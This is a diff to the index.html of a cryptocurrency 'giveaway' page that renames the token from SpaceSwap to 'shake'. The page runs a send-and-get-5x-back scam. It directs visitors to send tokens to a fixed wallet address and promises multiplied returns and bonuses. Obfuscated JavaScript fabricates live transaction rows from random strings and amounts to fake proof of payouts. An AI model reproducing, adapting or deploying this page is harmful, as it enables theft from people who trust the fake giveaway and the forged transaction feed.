--- a/index.html
+++ b/index.html
@@ -7,7 +7,7 @@
     <meta name="msapplication-TileImage" content="logo.png">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <meta http-equiv="X-UA-Compatible" content="ie=edge">
-    <title>Get 50,000 SpaceSwap giveaway | SpaceSwap believe that blockchain and SpaceSwap coin will make
+    <title>Get 50,000 SpaceSwap giveaway | shake believe that blockchain and shake coin will make
         the world more
         fair. To speed up the process of cryptocurrency..........</title>
     <link href="index_files/bootstrap.min.css" rel="stylesheet" />
@@ -45,18 +45,18 @@
                     <span style="font-family:lucida sans unicode,lucida grande,sans-serif;"><strong>Join the
                             giveaway</strong></span>
                 </h1>
-                <p class="subtitle" style:"color:#fff">SpaceSwap believe that blockchain and SpaceSwap coin will make
+                <p class="subtitle" style:"color:#fff">SpaceSwap believe that blockchain and shake coin will make
                     the
                     world more fair.
                     To
-                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 50,000 SpaceSwap
+                    speed up the process of<strong> cryptocurrency mass adoption, We decided to run 50,000 shake
                         giveaway.
                     </strong>We believe that this will help in growing the crypto community.<br />
                     <br />
 
-                    To participate you just need to send from 0.5 SpaceSwap to 200 SpaceSwap to the contribution address
+                    To participate you just need to send from 0.5 shake to 200 shake to the contribution address
                     and
-                    we will immediately send you back<strong> 2.5 SpaceSwap to 1,000 SpaceSwap (x5 back) to the address
+                    we will immediately send you back<strong> 2.5 shake to 1,000 shake (x5 back) to the address
                         you
                         sent
                         it from
@@ -66,7 +66,7 @@
                     participate..
                     <br>
                     <br>
-                    <strong>To participate in this airdrop, send tokens to the SpaceSwap payment address by using the
+                    <strong>To participate in this airdrop, send tokens to the shake payment address by using the
                         instructions on the
                         section below as a guide.</strong>
                 </p>
@@ -128,27 +128,27 @@
                                 example: </b></p>
 
                         <ul style="padding:0 0 0 20px">
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 0.5 SpaceSwap,
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 0.5 shake,
                                     you
-                                    will get 2.5 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 2 SpaceSwap,
+                                    will get 2.5 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 2 shake,
                                     you
-                                    will get 10 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5 SpaceSwap,
+                                    will get 10 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 5 shake,
                                     you
-                                    will get 25 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10 SpaceSwap,
+                                    will get 25 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 10 shake,
                                     you
-                                    will get 50 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 20 SpaceSwap,
+                                    will get 50 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 20 shake,
                                     you
-                                    will get 100 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 50 SpaceSwap,
+                                    will get 100 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 50 shake,
                                     you
-                                    will get 250 SpaceSwap back</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 200 SpaceSwap,
+                                    will get 250 shake back</span></li>
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>If you send 200 shake,
                                     you
-                                    will get 1,000 SpaceSwap back</span></li>
+                                    will get 1,000 shake back</span></li>
 
                         </ul>
                     </div>
@@ -159,26 +159,26 @@
                         </p>
 
                         <ul>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10 SpaceSwap + = 0.01 SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>10 shake + = 0.01 shake
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>20 SpaceSwap + = 0.02
-                                    SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>20 shake + = 0.02
+                                    shake
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>25 SpaceSwap + = 0.03 SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>25 shake + = 0.03 shake
                                     BONUS</span></li>
                             <li style="font-size: 12pt; color: #fff;padding: 5px;">
-                                <spa5>35 SpaceSwap + = 0.04
-                                    SpaceSwap
+                                <spa5>35 shake + = 0.04
+                                    shake
                                     BONUS</span>
                             </li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>50 SpaceSwap + = 0.05
-                                    SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>50 shake + = 0.05
+                                    shake
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>100 SpaceSwap + = 0.06
-                                    SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>100 shake + = 0.06
+                                    shake
                                     BONUS</span></li>
-                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>200 SpaceSwap + = 0.08
-                                    SpaceSwap
+                            <li style="font-size: 12pt; color: #fff;padding: 5px;"><span>200 shake + = 0.08
+                                    shake
                                     BONUS</span></li>
 
 
@@ -192,9 +192,9 @@
                 <div class="instruction-blocks">
                     <div class="payment instruction-payment">
                         <div class="payment-row">
-                            <h4 class="payment-title">SpaceSwap Payment Address</h4>
+                            <h4 class="payment-title">shake Payment Address</h4>
 
-                            <p class="payment-description">You can send SpaceSwap to the following address:</p>
+                            <p class="payment-description">You can send shake to the following address:</p>
                             <button data-clipboard-text="0x73f750C78716CA38D56AB07025BbEd8B37fcBE39"><img alt=""
                                     src="copy.html" /> Copy Address to
                                 Clipboard</button>
@@ -233,7 +233,7 @@
                                 2,000</p>
 
                             <p class="instruction-money__chanse">Last chance<br />
-                                to get your SpaceSwap </p>
+                                to get your shake </p>
                         </div>
                     </div>
                 </div>
@@ -284,7 +284,7 @@
                             <div class="row header-trans">
                                 <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">TxHash</div>
 
-                                <div class="block-SpaceSwap m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
+                                <div class="block-shake m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
 
                                 <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">From</div>
 
@@ -388,7 +388,7 @@
                     <div class="instruction-item__text"
                         style="background:#0C149D;border:2px solid #fff;padding:5px 10px;">
                         Every address that is sent<br />
-                        too late, gets their SpaceSwap <br />
+                        too late, gets their shake <br />
                         immediately sent back.</div>
                 </div>
             </div>
@@ -407,7 +407,7 @@
                         <div class="row header-trans">
                             <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">TxHash</div>
 
-                            <div class="block-SpaceSwap m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
+                            <div class="block-shake m col-lg-1 col-md-1 col-sm-1 col-xs-1">Block</div>
 
                             <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">From</div>
 
@@ -480,7 +480,7 @@
                 let chainType = [1, 1]
                 divCounter++;
                 var _0xe480x9 =
-                    `${' <div class="inner">\x0D\x0A    <div class="top">\x0D\x0A        <div class="row row-trans-out">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{t1}</div>\x0D\x0A            <div class="block-SpaceSwap m col-lg-1 col-md-1 col-sm-1 col-xs-1">{t2}</div>\x0D\x0A          <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{t4}</div>\x0D\x0A            <div class="out-trans col-lg-1 col-md-1 col-sm-2 col-xs-2">{t5}</div>\x0D\x0A            <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{t6}</div>\x0D\x0A              <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{t3}</div>\x0D\x0A        <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{t7}</div>\x0D\x0A         <div class="tx-fee col-lg-1 col-md-1 col-sm-1 col-xs-1">{t8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    <div class="bottom">\x0D\x0A        <div class="row row-trans-in">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{b1}</div>\x0D\x0A            <div class="block-SpaceSwap m col-lg-1 col-md-1 col-sm-1 col-xs-1">{b2}</div>\x0D\x0A                       <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{b4}</div>\x0D\x0A            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1">{b5}</div>\x0D\x0A            <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{b6}</div>\x0D\x0A    <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{b3}</div>\x0D\x0A         <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{b7}</div>\x0D\x0A            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">{b8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    </div>\x0D\x0A    '}`;
+                    `${' <div class="inner">\x0D\x0A    <div class="top">\x0D\x0A        <div class="row row-trans-out">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{t1}</div>\x0D\x0A            <div class="block-shake m col-lg-1 col-md-1 col-sm-1 col-xs-1">{t2}</div>\x0D\x0A          <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{t4}</div>\x0D\x0A            <div class="out-trans col-lg-1 col-md-1 col-sm-2 col-xs-2">{t5}</div>\x0D\x0A            <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{t6}</div>\x0D\x0A              <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{t3}</div>\x0D\x0A        <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{t7}</div>\x0D\x0A         <div class="tx-fee col-lg-1 col-md-1 col-sm-1 col-xs-1">{t8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    <div class="bottom">\x0D\x0A        <div class="row row-trans-in">\x0D\x0A            <div class="hash col-lg-2 col-md-2 col-sm-2 col-xs-2">{b1}</div>\x0D\x0A            <div class="block-shake m col-lg-1 col-md-1 col-sm-1 col-xs-1">{b2}</div>\x0D\x0A                       <div class="address-VET col-lg-2 col-md-2 col-sm-2 col-xs-2">{b4}</div>\x0D\x0A            <div class="in-trans col-lg-1 col-md-1 col-sm-1 col-xs-1">{b5}</div>\x0D\x0A            <div class="address-VET-sec col-lg-2 col-md-2 col-sm-2 col-xs-2">{b6}</div>\x0D\x0A    <div class="age col-lg-1 col-md-1 col-sm-1 col-xs-1">{b3}</div>\x0D\x0A         <div class="value col-lg-2 col-md-2 col-sm-2 col-xs-2">{b7}</div>\x0D\x0A            <div class="tx-fee col-lg-1 col-md-1 col-sm-2 col-xs-2">{b8}</div>\x0D\x0A        </div>\x0D\x0A    </div>\x0D\x0A    </div>\x0D\x0A    '}`;
                 let _0xe480xa = '' + randomString(7) + '..';
                 let _0xe480xb = blocks[randomInteger(0, blocks.length - 1)];
                 let _0xe480xc = 'just now';
@@ -488,7 +488,7 @@
                 let _0xe480xe = 'IN';
                 let _0xe480xf = '0x73f750C78716CA38D56AB07025BbEd8B37fcBE39';
                 let valueSend = randomInteger(200, 5000);
-                let _0xe480x10 = valueSend + ' SpaceSwap  ';
+                let _0xe480x10 = valueSend + ' shake  ';
                 let _0xe480x11 = ((Math['random']() * 0.0099) + 0.0010)['toFixed'](5);
                 let _0xe480x12 = '' + randomString(7) + '...';
                 let _0xe480x13 = 616135;
@@ -496,7 +496,7 @@
                 let _0xe480x15 = _0xe480xf.slice(0, 10) + "...";
                 let _0xe480x16 = 'OUT';
                 let _0xe480x17 = _0xe480xd;
-                let _0xe480x18 = (valueSend * 5) + ' SpaceSwap  ';
+                let _0xe480x18 = (valueSend * 5) + ' shake  ';
                 let _0xe480x19 = ((Math['random']() * 0.0099) + 0.0010)['toFixed'](5);
                 _0xe480x9 = _0xe480x9['replace']('{t1}', _0xe480x12);
                 _0xe480x9 = _0xe480x9['replace']('{t2}', _0xe480x13);
